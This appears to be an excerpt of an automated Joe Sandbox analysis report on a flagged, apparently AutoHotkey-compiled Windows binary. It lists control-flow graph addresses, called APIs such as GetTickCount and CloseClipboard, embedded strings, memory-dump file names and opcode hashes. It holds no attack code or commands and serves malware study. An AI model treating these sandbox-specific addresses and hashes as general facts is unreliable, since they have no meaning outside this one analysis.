                            control_flow_graph 3682 140038239-140038254 call 1400cab74 3685 140038326-140038341 call 1400cab74 3682->3685 3686 14003825a-140038272 call 14002db70 3682->3686 3693 140038347-140038354 3685->3693 3694 140038a7f 3685->3694 3691 140038a84-140038a91 3686->3691 3692 140038278-14003829c call 14002dc40 call 1400cb614 3686->3692 3699 140038a97-140038aa5 3691->3699 3700 140038e4e-140038e7b 3691->3700 3711 1400382ab-1400382ad 3692->3711 3712 14003829e-1400382a9 call 14001c020 3692->3712 3697 140038377-14003837e 3693->3697 3698 140038356-140038359 3693->3698 3694->3691 3697->3694 3702 14003835b-14003835e 3698->3702 3703 140038369-140038372 3698->3703 3704 140038ab1 3699->3704 3702->3697 3706 140038360-140038363 3702->3706 3703->3694 3707 140038ab5-140038ab8 3704->3707 3706->3694 3706->3703 3709 140038e4c 3707->3709 3710 140038abe-140038ac0 3707->3710 3709->3700 3716 140032601-14003261e GetTickCount 3710->3716 3717 1400325d0-1400325d8 3710->3717 3715 1400382af-1400382bf 3711->3715 3712->3715 3715->3691 3719 1400382c5-140038321 call 1400ad040 call 1400cafcc 3715->3719 3722 140032657-14003265e 3716->3722 3723 140032620-14003263d PeekMessageW 3716->3723 3720 1400325da-1400325e7 GlobalUnlock 3717->3720 3721 1400325ee-1400325fa CloseClipboard 3717->3721 3719->3691 3720->3721 3721->3716 3727 14003268a-140032698 3722->3727 3728 140032660-140032667 3722->3728 3725 140032649-140032651 GetTickCount 3723->3725 3726 14003263f-140032644 call 140001a70 3723->3726 3725->3722 3726->3725 3731 14003269a-14003269d 3727->3731 3732 14003269f-1400326a5 3727->3732 3728->3727 3734 140032669-140032672 3728->3734 3731->3732 3736 1400326b1-1400326bd call 140001a70 3731->3736 3737 1400326c4-1400326cb 3732->3737 3738 1400326a7-1400326af 3732->3738 3734->3727 3739 140032674-140032679 3734->3739 3736->3737 3741 1400326ec-1400326ff 3737->3741 3742 1400326cd 3737->3742 3738->3736 3738->3737 3743 140032684-140032687 3739->3743 3744 14003267b-140032682 3739->3744 3747 140032701-140032748 GetTickCount 3741->3747 3748 14003274d-140032753 3741->3748 3746 1400326d0-1400326e3 call 140001a70 3742->3746 3743->3727 3744->3727 3758 1400326e5 3746->3758 3747->3748 3749 140032791 3748->3749 3750 140032755-140032757 3748->3750 3754 140032798-1400327a4 3749->3754 3750->3749 3752 140032759-140032762 3750->3752 3752->3754 3755 140032764-14003277d call 14008a1a0 3752->3755 3756 1400327aa-1400327ae 3754->3756 3757 14003295e-140032971 3754->3757 3755->3700 3767 140032783-14003278f 3755->3767 3756->3757 3762 1400327b4-1400327c9 call 140039340 3756->3762 3760 140033c77-140033ca4 3757->3760 3761 140032977-14003298a 3757->3761 3758->3741 3764 140038e41-140038e43 3760->3764 3765 140033caa-140033cb4 3760->3765 3768 140033c06-140033c0a 3761->3768 3771 140032896-1400328a8 3762->3771 3772 1400327cf-1400327db 3762->3772 3764->3700 3770 140038aa7 3765->3770 3767->3754 3768->3770 3775 140038aac 3770->3775 3773 14003294c-140032953 3771->3773 3774 1400328ae-1400328b5 3771->3774 3776 14003280f-14003282d call 140032520 3772->3776 3777 1400327dd 3772->3777 3773->3709 3778 140032959 3773->3778 3779 1400328b7 3774->3779 3780 1400328ef-14003290d call 140032520 3774->3780 3775->3704 3787 140032832-140032835 3776->3787 3781 1400327e0-14003280b call 140032520 3777->3781 3778->3704 3784 1400328c0-1400328eb call 140032520 3779->3784 3794 140032912-140032919 3780->3794 3791 14003280d 3781->3791 3797 1400328ed 3784->3797 3787->3704 3792 14003283b-140032842 3787->3792 3791->3787 3795 140038ad1-140038ada 3792->3795 3796 140032848-14003284b 3792->3796 3798 140038ac5-140038acc 3794->3798 3799 14003291f-140032922 3794->3799 3795->3700 3796->3795 3800 140032851-140032854 3796->3800 3797->3794 3798->3709 3799->3798 3801 140032928-14003292b 3799->3801 3803 140032871-140032882 3800->3803 3804 140032856-14003285e 3800->3804 3801->3768 3802 140032931-140032939 3801->3802 3805 140038adf-140038aeb 3802->3805 3806 14003293f-140032947 3802->3806 3803->3707 3807 140032888-140032891 3803->3807 3804->3798 3808 140032864-14003286c 3804->3808 3805->3700 3806->3775 3807->3707 3808->3704
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
                            • String ID: %%%s%s%s$Float$Integer
                            • API String ID: 130734711-2931010843
                            • Opcode ID: 3de39754bbb8a91c047c906dacb25b23fe9819f7d9e596eb34db751b8ead5856
                            • Instruction ID: 8dc8d90c5fb2f1347c5d65d08f156a7567831a2b358138a18f47a6d00b83f320
                            • Opcode Fuzzy Hash: 3de39754bbb8a91c047c906dacb25b23fe9819f7d9e596eb34db751b8ead5856
                            • Instruction Fuzzy Hash: 25B18B31205B4086FB6B8B27E8947EA77A1B74DBD4F540116FB5A876F5DB38C880C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3810 140037bee-140037c03 call 14008c0a0 3813 140037c16 3810->3813 3814 140037c05-140037c14 3810->3814 3815 140037c19-140037c24 3813->3815 3814->3815 3816 140037c26-140037c3a 3815->3816 3817 140037c3c-140037c3e 3815->3817 3820 140037c86-140037c94 call 1400b3ef0 3816->3820 3818 140037c56-140037c7f call 14002dd40 call 14002dc40 3817->3818 3819 140037c40-140037c54 3817->3819 3818->3820 3819->3820 3825 140037c96-140037ca1 GetLastError 3820->3825 3826 140037cb9-140037cc4 3820->3826 3825->3826 3828 140037ca3-140037cb4 3825->3828 3829 140038a58 3826->3829 3830 140038a66-140038a6c 3826->3830 3828->3829 3832 140038a60-140038a64 3829->3832 3833 140038a5b call 1400403f0 3829->3833 3834 140038a72-140038a91 3830->3834 3835 140038e4e-140038e7b 3830->3835 3832->3830 3833->3832 3834->3835 3837 140038a97-140038aa5 3834->3837 3838 140038ab1 3837->3838 3839 140038ab5-140038ab8 3838->3839 3840 140038e4c 3839->3840 3841 140038abe-140038ac0 3839->3841 3840->3835 3843 140032601-14003261e GetTickCount 3841->3843 3844 1400325d0-1400325d8 3841->3844 3847 140032657-14003265e 3843->3847 3848 140032620-14003263d PeekMessageW 3843->3848 3845 1400325da-1400325e7 GlobalUnlock 3844->3845 3846 1400325ee-1400325fa CloseClipboard 3844->3846 3845->3846 3846->3843 3851 14003268a-140032698 3847->3851 3852 140032660-140032667 3847->3852 3849 140032649-140032651 GetTickCount 3848->3849 3850 14003263f-140032644 call 140001a70 3848->3850 3849->3847 3850->3849 3853 14003269a-14003269d 3851->3853 3854 14003269f-1400326a5 3851->3854 3852->3851 3856 140032669-140032672 3852->3856 3853->3854 3857 1400326b1-1400326bd call 140001a70 3853->3857 3858 1400326c4-1400326cb 3854->3858 3859 1400326a7-1400326af 3854->3859 3856->3851 3860 140032674-140032679 3856->3860 3857->3858 3862 1400326ec-1400326ff 3858->3862 3863 1400326cd 3858->3863 3859->3857 3859->3858 3864 140032684-140032687 3860->3864 3865 14003267b-140032682 3860->3865 3868 140032701-140032748 GetTickCount 3862->3868 3869 14003274d-140032753 3862->3869 3867 1400326d0-1400326e3 call 140001a70 3863->3867 3864->3851 3865->3851 3879 1400326e5 3867->3879 3868->3869 3870 140032791 3869->3870 3871 140032755-140032757 3869->3871 3875 140032798-1400327a4 3870->3875 3871->3870 3873 140032759-140032762 3871->3873 3873->3875 3876 140032764-14003277d call 14008a1a0 3873->3876 3877 1400327aa-1400327ae 3875->3877 3878 14003295e-140032971 3875->3878 3876->3835 3888 140032783-14003278f 3876->3888 3877->3878 3883 1400327b4-1400327c9 call 140039340 3877->3883 3881 140033c77-140033ca4 3878->3881 3882 140032977-14003298a 3878->3882 3879->3862 3885 140038e41-140038e43 3881->3885 3886 140033caa-140033cb4 3881->3886 3889 140033c06-140033c0a 3882->3889 3892 140032896-1400328a8 3883->3892 3893 1400327cf-1400327db 3883->3893 3885->3835 3891 140038aa7 3886->3891 3888->3875 3889->3891 3896 140038aac 3891->3896 3894 14003294c-140032953 3892->3894 3895 1400328ae-1400328b5 3892->3895 3897 14003280f-14003282d call 140032520 3893->3897 3898 1400327dd 3893->3898 3894->3840 3899 140032959 3894->3899 3900 1400328b7 3895->3900 3901 1400328ef-14003290d call 140032520 3895->3901 3896->3838 3908 140032832-140032835 3897->3908 3902 1400327e0-14003280b call 140032520 3898->3902 3899->3838 3905 1400328c0-1400328eb call 140032520 3900->3905 3915 140032912-140032919 3901->3915 3912 14003280d 3902->3912 3918 1400328ed 3905->3918 3908->3838 3913 14003283b-140032842 3908->3913 3912->3908 3916 140038ad1-140038ada 3913->3916 3917 140032848-14003284b 3913->3917 3919 140038ac5-140038acc 3915->3919 3920 14003291f-140032922 3915->3920 3916->3835 3917->3916 3921 140032851-140032854 3917->3921 3918->3915 3919->3840 3920->3919 3922 140032928-14003292b 3920->3922 3924 140032871-140032882 3921->3924 3925 140032856-14003285e 3921->3925 3922->3889 3923 140032931-140032939 3922->3923 3926 140038adf-140038aeb 3923->3926 3927 14003293f-140032947 3923->3927 3924->3839 3928 140032888-140032891 3924->3928 3925->3919 3929 140032864-14003286c 3925->3929 3926->3835 3927->3896 3928->3839 3929->3838
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseErrorGlobalLastMessagePeekUnlockfree
                            • String ID: Parameter #1 invalid.$Press OK to continue.
                            • API String ID: 2434512724-108709617
                            • Opcode ID: b3e613c62b5422ce961cbc385aef539ae5464c67cef198828a281a9f89896451
                            • Instruction ID: d07b8fb80a25cd0d96599d1df8f33114051de0a463f8559f55a56e0e05a480fb
                            • Opcode Fuzzy Hash: b3e613c62b5422ce961cbc385aef539ae5464c67cef198828a281a9f89896451
                            • Instruction Fuzzy Hash: 8FB17F32604B4486FB6B8B27E8907EA67A1F74DBE4F540116FB5A47AF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3978 1400053f0-140005412 3979 140005418-14000541d 3978->3979 3980 1400054de-1400054f5 call 1400059f0 3978->3980 3982 140005420-14000543c call 1400ca91c 3979->3982 3985 1400054fb-14000553a call 1400cd7f4 3980->3985 3986 140005670-140005680 3980->3986 3989 1400054bb 3982->3989 3990 14000543e-14000544f call 1400ca91c 3982->3990 3994 140005573-140005586 3985->3994 3995 14000553c 3985->3995 3993 1400054c2-1400054d0 3989->3993 3990->3989 3999 140005451-140005462 call 1400ca91c 3990->3999 3993->3982 3997 1400054d6 3993->3997 4000 1400055c3 3994->4000 4001 140005588-14000558d 3994->4001 3998 140005540-14000555f call 1400ca91c 3995->3998 3997->3980 4013 140005561-140005564 3998->4013 4014 140005566 3998->4014 4010 1400054b2-1400054b9 3999->4010 4011 140005464-140005475 call 1400ca91c 3999->4011 4004 1400055c5-1400055f6 call 14002e590 4000->4004 4001->4000 4002 14000558f 4001->4002 4006 140005590-1400055af call 1400ca91c 4002->4006 4021 1400055f9-14000560c 4004->4021 4023 1400055b1-1400055b4 4006->4023 4024 1400055b6 4006->4024 4010->3993 4011->4010 4027 140005477-14000548e call 1400cab74 4011->4027 4018 14000556f-140005571 4013->4018 4019 14000556c 4014->4019 4020 140005650-14000565a 4014->4020 4018->3994 4018->3998 4019->4018 4020->4021 4025 14000565c-14000566b 4020->4025 4021->3986 4026 14000560e-140005629 call 1400a4e20 4021->4026 4028 1400055bf-1400055c1 4023->4028 4024->4020 4029 1400055bc 4024->4029 4025->4004 4026->3986 4033 14000562b-14001ed51 call 1400b1860 call 1400d23b0 GetModuleFileNameW 4026->4033 4036 1400054d8 4027->4036 4037 140005490-140005499 4027->4037 4028->4000 4028->4006 4029->4028 4046 14001ed53-14001ed5a 4033->4046 4047 14001edb5-14001edf4 call 1400ae470 4033->4047 4036->3980 4039 14000549b 4037->4039 4040 14000549e-1400054b0 call 14001e0f0 4037->4040 4039->4040 4040->3993 4049 14001ed67-14001ed7b call 1400aa340 4046->4049 4050 14001ed5c-14001ed66 4046->4050 4051 14001edf9-14001ee07 4047->4051 4049->4050 4058 14001ed7d-14001ed8f call 1400cc7ac 4049->4058 4053 14001ee09-14001ee33 call 1400aa400 4051->4053 4054 14001ee6d 4051->4054 4065 14001ee51-14001ee54 4053->4065 4066 14001ee35-14001ee4f call 140040740 4053->4066 4056 14001ee70-14001ee82 4054->4056 4059 14001eee2-14001eee4 4056->4059 4060 14001ee84-14001ee99 call 1400cc7ac 4056->4060 4058->4047 4068 14001ed91-14001edb3 call 1400aa340 4058->4068 4067 14001ef5e-14001ef86 4059->4067 4074 14001eec5 4060->4074 4075 14001ee9b-14001eebd call 1400aa340 4060->4075 4071 14001ee66-14001ee6b 4065->4071 4072 14001ee56-14001ee61 call 1400cb2e0 4065->4072 4066->4056 4068->4047 4068->4050 4071->4056 4072->4071 4080 14001eeca-14001eee0 call 1400aa340 4074->4080 4075->4059 4083 14001eebf-14001eec3 4075->4083 4080->4059 4085 14001eee6-14001eeeb 4080->4085 4083->4080 4086 14001ef4e-14001ef5c 4085->4086 4087 14001eeed-14001ef16 call 1400aa400 4085->4087 4086->4067 4090 14001ef35-14001ef38 4087->4090 4091 14001ef18-14001ef33 call 140040740 4087->4091 4093 14001ef4a 4090->4093 4094 14001ef3a-14001ef45 call 1400cb2e0 4090->4094 4091->4086 4093->4086 4094->4093
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _errno_invalid_parameter_noinfo$wcsncpy
                            • String ID: /ErrorStdOut$/force$/restart$=$A_Args$Out of memory.
                            • API String ID: 3818259516-673611611
                            • Opcode ID: ec19a6a06cb02f366bdee82cf9a523ecbdf44ce6dfe4094d848e935c2be9526b
                            • Instruction ID: 751609671aba6611be446afd5e0fc0c4ca0573d1f5ff84674f8ab6cd321f7fa6
                            • Opcode Fuzzy Hash: ec19a6a06cb02f366bdee82cf9a523ecbdf44ce6dfe4094d848e935c2be9526b
                            • Instruction Fuzzy Hash: CFD1AC72205B8581EA26DB26E8443DE63A1F78D7D8F880211FB4D4B6E9EF7DC649C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4097 1400388cf-1400388d6 4098 1400388d8-1400388df 4097->4098 4099 14003894f-140038973 call 14001cfd0 4097->4099 4101 1400388e1-1400388ea 4098->4101 4102 14003892b-14003892f 4098->4102 4107 140038975-140038987 4099->4107 4108 140038989 4099->4108 4104 1400388ec-14003891b call 1400ad210 4101->4104 4105 14003891d 4101->4105 4106 140038936-14003894a call 1400aa1d0 4102->4106 4110 140038924-140038929 4104->4110 4105->4110 4115 140038a60-140038a64 4106->4115 4113 140038990-140038994 4107->4113 4108->4113 4110->4106 4116 140038996-14003899b 4113->4116 4117 14003899d-1400389b5 call 1400ca91c 4113->4117 4119 140038a66-140038a6c 4115->4119 4118 1400389b9-1400389d4 call 1400aa1d0 4116->4118 4117->4118 4118->4119 4128 1400389da-1400389dd 4118->4128 4121 140038a72-140038a91 4119->4121 4122 140038e4e-140038e7b 4119->4122 4121->4122 4127 140038a97-140038aa5 4121->4127 4129 140038ab1 4127->4129 4128->4119 4130 1400389e3 4128->4130 4131 140038ab5-140038ab8 4129->4131 4130->4115 4132 140038e4c 4131->4132 4133 140038abe-140038ac0 4131->4133 4132->4122 4135 140032601-14003261e GetTickCount 4133->4135 4136 1400325d0-1400325d8 4133->4136 4139 140032657-14003265e 4135->4139 4140 140032620-14003263d PeekMessageW 4135->4140 4137 1400325da-1400325e7 GlobalUnlock 4136->4137 4138 1400325ee-1400325fa CloseClipboard 4136->4138 4137->4138 4138->4135 4143 14003268a-140032698 4139->4143 4144 140032660-140032667 4139->4144 4141 140032649-140032651 GetTickCount 4140->4141 4142 14003263f-140032644 call 140001a70 4140->4142 4141->4139 4142->4141 4145 14003269a-14003269d 4143->4145 4146 14003269f-1400326a5 4143->4146 4144->4143 4148 140032669-140032672 4144->4148 4145->4146 4149 1400326b1-1400326bd call 140001a70 4145->4149 4150 1400326c4-1400326cb 4146->4150 4151 1400326a7-1400326af 4146->4151 4148->4143 4152 140032674-140032679 4148->4152 4149->4150 4154 1400326ec-1400326ff 4150->4154 4155 1400326cd 4150->4155 4151->4149 4151->4150 4156 140032684-140032687 4152->4156 4157 14003267b-140032682 4152->4157 4160 140032701-140032748 GetTickCount 4154->4160 4161 14003274d-140032753 4154->4161 4159 1400326d0-1400326e3 call 140001a70 4155->4159 4156->4143 4157->4143 4171 1400326e5 4159->4171 4160->4161 4162 140032791 4161->4162 4163 140032755-140032757 4161->4163 4167 140032798-1400327a4 4162->4167 4163->4162 4165 140032759-140032762 4163->4165 4165->4167 4168 140032764-14003277d call 14008a1a0 4165->4168 4169 1400327aa-1400327ae 4167->4169 4170 14003295e-140032971 4167->4170 4168->4122 4180 140032783-14003278f 4168->4180 4169->4170 4175 1400327b4-1400327c9 call 140039340 4169->4175 4173 140033c77-140033ca4 4170->4173 4174 140032977-14003298a 4170->4174 4171->4154 4177 140038e41-140038e43 4173->4177 4178 140033caa-140033cb4 4173->4178 4181 140033c06-140033c0a 4174->4181 4184 140032896-1400328a8 4175->4184 4185 1400327cf-1400327db 4175->4185 4177->4122 4183 140038aa7 4178->4183 4180->4167 4181->4183 4188 140038aac 4183->4188 4186 14003294c-140032953 4184->4186 4187 1400328ae-1400328b5 4184->4187 4189 14003280f-14003282d call 140032520 4185->4189 4190 1400327dd 4185->4190 4186->4132 4191 140032959 4186->4191 4192 1400328b7 4187->4192 4193 1400328ef-14003290d call 140032520 4187->4193 4188->4129 4200 140032832-140032835 4189->4200 4194 1400327e0-14003280b call 140032520 4190->4194 4191->4129 4197 1400328c0-1400328eb call 140032520 4192->4197 4207 140032912-140032919 4193->4207 4204 14003280d 4194->4204 4210 1400328ed 4197->4210 4200->4129 4205 14003283b-140032842 4200->4205 4204->4200 4208 140038ad1-140038ada 4205->4208 4209 140032848-14003284b 4205->4209 4211 140038ac5-140038acc 4207->4211 4212 14003291f-140032922 4207->4212 4208->4122 4209->4208 4213 140032851-140032854 4209->4213 4210->4207 4211->4132 4212->4211 4214 140032928-14003292b 4212->4214 4216 140032871-140032882 4213->4216 4217 140032856-14003285e 4213->4217 4214->4181 4215 140032931-140032939 4214->4215 4218 140038adf-140038aeb 4215->4218 4219 14003293f-140032947 4215->4219 4216->4131 4220 140032888-140032891 4216->4220 4217->4211 4221 140032864-14003286c 4217->4221 4218->4122 4219->4188 4220->4131 4221->4129
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID: %s\%s$ahk_default
                            • API String ID: 1623861271-75935552
                            • Opcode ID: 7f54181938fa6dd6b2ca4d7d7e30e5037256e33b2bc02bdb2bf648ecc0cb6066
                            • Instruction ID: f0f5f52bb075880dc459a98bc6115b518e2fc0c452e5c9740d08abc663d87789
                            • Opcode Fuzzy Hash: 7f54181938fa6dd6b2ca4d7d7e30e5037256e33b2bc02bdb2bf648ecc0cb6066
                            • Instruction Fuzzy Hash: 4DB16E32204B4486FB67CB27E8447EA67A1F74DBD4F584116EB9947AF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _errno_invalid_parameter_noinfo$_wsopen_s
                            • String ID: =$UNICODE$UTF-16LE$UTF-8$ccs
                            • API String ID: 2449612375-31882262
                            • Opcode ID: c21209d492e7823e4180e08be6558a3d4006f18815a6f4894d8be109b368a5ae
                            • Instruction ID: 1572161f7d5f4941326572ac831e80753e07b38669738fe1ae81e8fc4e823b00
                            • Opcode Fuzzy Hash: c21209d492e7823e4180e08be6558a3d4006f18815a6f4894d8be109b368a5ae
                            • Instruction Fuzzy Hash: 0771F176A0831081FB774E27A8047FD1291AF7DBD8F594116FF0A23AF5D638C98396A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
                            • String ID: Environment
                            • API String ID: 3716859204-3233436149
                            • Opcode ID: 8bc60ca8d758e9442f40f8790e9b4f09e40a09a7267d41fc112a7a271edf6435
                            • Instruction ID: 336c89efc6efc6b21550bf28d556fb81e5759c76ef5d6f4db9944c7f296df1f6
                            • Opcode Fuzzy Hash: 8bc60ca8d758e9442f40f8790e9b4f09e40a09a7267d41fc112a7a271edf6435
                            • Instruction Fuzzy Hash: 23916032205B4486FB6B8B27E8947EA77A1F74DBE4F540116EB5947AF5DB38C881CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: freemalloc
                            • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                            • API String ID: 3061335427-457448710
                            • Opcode ID: 2d6363895a21a7d24569d45f10dc12e654b1b1bc4baff34a2c154c6e8dcbd625
                            • Instruction ID: 56721556733193cb0086889d139faaee66658be3c45cd5c525be3dd50c05441b
                            • Opcode Fuzzy Hash: 2d6363895a21a7d24569d45f10dc12e654b1b1bc4baff34a2c154c6e8dcbd625
                            • Instruction Fuzzy Hash: 3DE19072605B8481FB628F16A4047EA77A5F78EBD8F440116EB9907BB8DB7CC695C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
